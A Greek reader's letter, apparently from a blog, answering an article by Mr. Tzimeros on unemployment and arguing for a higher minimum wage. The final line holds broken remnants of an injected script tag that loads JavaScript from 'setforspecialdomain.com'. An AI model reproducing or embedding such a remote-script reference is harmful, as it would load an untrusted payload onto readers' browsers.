Ο Γιώργος …του Τζήμερου

ψαχνουν-στα-σκουπιδια

Διάβασα το άρθρο του κ. Τζήμερου για τον Γιώργο και την ανεργία και έχω να πω, πως αν ο Γιώργος ήταν ένας πολίτης κι’ όχι άνθρωπος του καναπέ, να ενημερώνεται από  τα κάθε λογής «παπαγαλάκια» και «μαϊμούδες» των ΜΜΕ θα απαντούσε στον κ. Τζήμερο:

«κ. Τζήμερε θα παλέψω για μια αξιοπρεπή ζωή και μια αξιοπρεπή δουλειά, που θα μου εξασφαλίζει συνθήκες ζωής σε μένα και την οικογένειά μου και δεν θα δεχτώ, τη μοίρα που κάποιοι άλλοι αποφάσισαν για μένα και με καταδικάζει στην φτώχεια, την ανεργία και τον εξευτελισμό μου ως άνθρωπο. Σ’ αυτό τον αγώνα μου δεν θα είμαι μόνος. Θα έχω δίπλα πολλούς, από τον εμπορικό σύλλογο, μέχρι τη ΓΣΕΕ, τη ΓΣΕΒΕ, EBEA, ακόμη και τον ΣΕΒ, που παρά τις όποιες μικρές επιφυλάξεις του στην ουσία δεν διαφωνεί με τις εξαγγελίες του κόμματος της αξιωματικής αντιπολίτευσης και τον κατώτατο μισθό στα 751 ευρώ και με συλλογική σύμβαση εργασία, ίσα ίσα που αποτελεί αίτημα, Παρότρυνση αυτών των κοινωνικών ομάδων προς την Κυβέρνηση.

Εξ’ άλλου, όπως έχουν γράψει και έχουν πει γνωστοί ξένοι οικονομολόγοι (και οι παραπάνω ομάδες δε διαφωνούν), ο μισθός επηρεάζει ελάχιστα το κόστος του παραγόμενου προϊόντος μια επιχείρησης, άλλοι παράγοντες επηρεάζουν σημαντικά, όπως η ενέργεια, δάνεια, ΟΑΕΕ, και λοιπά, για τα οποία δε λέτε κάτι. Γιατί άραγε; Από σας θα περίμενα μια πιο έξυπνη προπαγάνδα, για να μπορέσετε να περάσετε αυτά που λέτε.

Εξ’ άλλου, όπως λέει και η κυρία Ελευθερία, απ’ το δίπλα διαμέρισμα τα χαΐρια του νεοφιλελευθερισμού τα είδαμε, 1,5 εκατομμύριο άνεργοι, φτώχεια στον κόσμο, εργασιακός μεσαίωνας και παράλογοι φόροι τύπου ΕΝΦΙΑ…»

Φιλικά… Γιώργος

 

Έγραψε ο «Αναγνώστης Εφημερίας»___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>